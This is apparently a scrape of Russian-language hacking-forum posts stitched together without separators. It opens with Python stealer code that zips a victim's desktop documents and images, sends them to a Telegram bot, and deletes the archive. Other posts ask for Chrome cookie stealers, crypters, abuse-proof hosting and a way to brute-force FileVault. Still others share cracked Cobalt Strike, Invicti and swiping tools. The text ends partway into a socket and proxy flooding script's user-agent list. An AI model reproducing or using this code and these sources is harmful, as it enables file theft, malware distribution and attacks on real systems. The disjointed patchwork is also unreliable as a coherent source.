# Имя папки, которая будет добавлена в архив
zip_folder_name = 'files'
# Итерируемся по всем найденным файлам и добавляем их в архив
with zipfile.ZipFile(zip_filename, 'w', zipfile.ZIP_DEFLATED) as zip_file:
for file_path in os.listdir(desktop_path):
if file_path.endswith(('.txt', '.rtf', '.jpg', '.png', '.doc', '.docs')):
full_path = os.path.join(desktop_path, file_path)
rel_path = os.path.relpath(full_path, desktop_path)
zip_file.write(full_path, arcname=os.path.join(zip_folder_name, rel_path))
# Открываем архив и отправляем его в чат
with open(zip_filename, 'rb') as f:
response = requests.post(
f'https://api.telegram.org/bot{bot_token}/sendDocument',
data={
'chat_id': chat_id,
},
files={
'document': (zip_filename, f, 'application/zip'),
},
params={
'caption': 'All files in archive',
}
)
if response.status_code != 200:
print(f'Failed to send message. Status code: {response.status_code}')
# Удаляем архив
os.remove(zip_filename)
Software License : Professional Edition
Source: [Invicti Professional Full](https://www.Dr-FarFar.com/invicti- professional-full/)
I would appreciate any link to at least part of the QNX 7.0+ source code. I've been looking for this for weeks. But there seems to be nothing on the internet. Does BlackBerry protect it so well?
Здравствуйте форумчане! Нужен стиллер под Windows, который вытягивает кукисы с хрома с любой возможной отправкой логов, спасибо.
Всем доброго времени суток!
Давненько уже не занимался ничем интересным и попросту вылетел из темы. В
связи с чем вопрос..
Подскажите какие на сегодняшний день есть рабочие free стиллеры, кто чем
криптует( не видел на форуме даже раздела с криптерами/джоинерами)
Какие на сегодняшний день абузоустойчивые vds/vps, на которых не будет страшно
держать свой мешок с подарками
Всем заранее спасибо за ответы!
Поделитесь пожалуйста кто имеет рабочий на данный момент сканер Nessus, искал на разных форумах но находил только старые версии которые уже не работают.
Features:
Brute Mode - 20k+ CPM
Full Capture Mode - Skin Check - Region Check - VP & RP
Full Proxy & Proxyless Support
Detailed & Sorted File Output (results)
Download
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/iOAEmTRK#kiZl1n3f3ahkEIr3ld4SI3L6IZ8gkCZPO-6do01Howg)
mega.nz
Virustotal
](https://www.virustotal.com/gui/file/cf45a301278ad7273fc29e12bc610974d5d7d0b7924e4f50f579f694047b7adc)
VirusTotal
www.virustotal.com
1. Sentinel
2. Crowd Strike
3. Sophos
4. И др.
magnet:? xt = urn: btih: 7101c26a2ba10ab2374dcc171f92a443bdc986c5 & dn = 21996.1.210529-1541.co_release_CLIENT_CONSUMER_x64FRE_en-us.iso
PANIX - это высоконастраиваемый инструмент сохранения данных в Linux, предназначенный для исследований в области безопасности, разработки средств обнаружения, тестирования на проникновение, CTF и многого другого. В нем приоритет отдается функциональности, а не скрытности, и он легко обнаруживается. PANIX поддерживается в таких популярных дистрибутивах, как Debian, Ubuntu и RHEL, и хорошо настраивается под различные ОС. PANIX будет поддерживаться в актуальном состоянии с учетом наиболее распространенных механизмов сохранения *nix, наблюдаемых в природе.
Research and Detection Engineering. ](https://github.com/Aegrah/PANIX)
Customizable Linux Persistence Tool for Security Research and Detection Engineering. - Aegrah/PANIX
github.com
может кому понадобиться хотя хрен кому такое говно нужно
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
aB4gLuqqN4_Sy1AET1Qi5O2DOiOZkQ)
mega.nz
Cobalt Strike Beacon Object File (BOF) that uses a custom HalosGate & HellsGate syscaller, written in assembly, to return a list of processes.
I was looking up on GitHub for a clean version of Cobalt and came across a few but they were old and/or not complete etc. I found a perfect one here:
[ https://github.com/ORCA666/Cobalt-Wipe ](https://github.com/ORCA666/Cobalt- Wipe)
but it has been DMCA'd, which was a shame as it was May's release (4.3) and complete. I managed to grab the original copy from wayback and have re- uploaded to ufile to present to you here. If you don't feel safe downloading it then just run the DMCA's link through the wayback machine yourself. Here is the link for the ufile upload:
](https://ufile.io/87kwiccn)
Download Cobalt-Wipe-main.zip for free from ufile.io instantly, no signup required and no popup ads
ufile.io
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Я искал на GitHub чистую версию Cobalt и наткнулся на несколько, но они были старыми и/или неполными и т. Д. Я нашел здесь идеальную:
[ https://github.com/ORCA666/Cobalt-Wipe ](https://github.com/ORCA666/Cobalt- Wipe)
но это был DMCA, что было обидно, так как это был майский релиз (4.3) и полный. Мне удалось захватить оригинальную копию с давних времен и повторно загрузить в файл, чтобы представить вам здесь. Если вы не чувствуете себя в безопасности, загружая его, просто запустите ссылку DMCA через машину обратной связи самостоятельно. Вот ссылка для загрузки файла:
](https://ufile.io/87kwiccn)
Download Cobalt-Wipe-main.zip for free from ufile.io instantly, no signup required and no popup ads
ufile.io
Download Link - https://www.upload-4ever.com/1f9u85scbzro
Привет форумчане! подскажите какой нибудь способ для решения задачи
есть два макбука, от одного я не помню пароль, диск шафифрован filevault,
перевожу мак на котором не помню пароль в режим диска, подключаю к другому и
он просит ввести пароль! Как этот пароль можно сбрутить?
Ищу Телеграмм клиент на ПК чтобы сидеть через аккаунт бота, вход через токен, подскажите где такие взять (лучше опенсурс решения)
//Русская версия
Вот я и сливаю часть программного обеспечения, используемого для Swiping.
Помните, Swiping не умер.
// English Version
Here i am, leaking some of the software used for swiping.
Remember, Swiping isn't dead.
Looking for the above softwares. Can anyone throw off a cracked version of sn1per professional or Acunetix? Spasibo
я пробовал icarepro и recuva / i have tried icarepro and recuva
This app uses algorithm AES 256 encryption For Encrypt Files and Decrypt Files
You can Encrypt Files and Decrypt Files by this app Easily
requirements
Visual Studio 2013/2015/2019
SQL Server 2008 R2 / 2014
.NET framework v.4
Note: Please install the fonts before using a this App
and this app for educational purposes not for crypting malware
Hidden content for authorized users.
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F66f6273e94f556d06bba15b21b507fb7546ad00d273c3b445019db2eb7b760a6%2Fmoneermasoud%2FGolden- Dragon-Crypter-v.1.0&hash=01a1875439627ee001d1e5f2362e37b2&return_error=1)
Crypter v.1.0 For Encrypt Files and Decrypt Files ](https://github.com/moneermasoud/Golden-Dragon-Crypter-v.1.0)
Golden Dragon Crypter v.1.0 For Encrypt Files and Decrypt Files - moneermasoud/Golden-Dragon-Crypter-v.1.0
github.com
Python:Copy to clipboard
import socket
import socks
import threading
import random
import re
import urllib.request
import os
import sys
print('''
.:' `:.
::' `::
:: :. .: ::
`:. `:. . .:' .:'
`::. `:: ! ::' .::'
`::.`::. .' ! `. .::'.::'
`:. `::::'':!:``::::' ::'
:'*:::. .:' ! `:. .:::*`:
:: HoH::. ` ! ' .::HoH ::
::: `H oH::. `!' .::Ho H' :::
::.. ` HoH:`: :':HoH ' ..::
`:: `T: `. .' :T' ::'
`:. . : : . .:'
`::' `::'
:' .`. . .'. `:
:' ::. .:: `:
:' `::: :::' `:
`. `` '' .'
:`...........':
` :`. .': '
`: `"""' :'
''')
useragents=["AdsBot-Google ( http://www.google.com/adsbot.html)",
"Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)",
"Baiduspider ( http://www.baidu.com/search/spider.htm)",
"BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103",
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0)",
"BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0",
"BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100",
"BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105",
"BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102",
"BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0",
"BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123",
"Bloglines/3.1 (http://www.bloglines.com)",
"CSSCheck/1.2.2",
"Dillo/2.0",
"DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"DoCoMo/2.0 SH901iC(c100;TB;W24H12)",
"Download Demon/3.5.0.11",
"ELinks/0.12~pre5-4",
"ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)",
"ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)",
"EmailWolf 1.00",
"everyfeed-spider/2.0 (http://www.everyfeed.com)",
"facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)",
"FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)",
"FeedFetcher-Google; ( http://www.google.com/feedfetcher.html)",
"Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php)",
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
"Googlebot-Image/1.0",
"Googlebot-News",
"Googlebot-Video/1.0",
"Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua)",
"grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org)",
"Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)",
"HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0",
"HTMLParser/1.6",
"iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2)",
"iTunes/9.0.2 (Windows; N)",
"iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)",
"Java/1.6.0_13",
"Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0",
"Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode)",
"LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1",
"LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"libwww-perl/5.820",
"Links/0.9.1 (Linux 2.4.24; i386;)",
"Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)",
"Links (2.1pre15; Linux 2.4.26 i686; 158x61)",
"Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)",
"Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12",
"Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d",
"Mediapartners-Google",
"Microsoft URL Control - 6.00.8862",
"Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) ",
"MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0",
"MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0",
"MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0",
"Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1",
"Mozilla/2.02E (Win95; U)",
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
"Mozilla/3.01Gold (Win95; I)",
"Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS)",
"Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180)",
"Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )",
"Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; winfx; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0) ",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0",
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
"Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]",
"Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)",
"Mozilla/4.8 [en] (Windows NT 5.1; U)",
"Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)",
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1",
"Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) ",
"Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1)",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu)",
"Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0",
"Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12",
"Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13",
"Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0",
"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145",
"Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3",
"Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
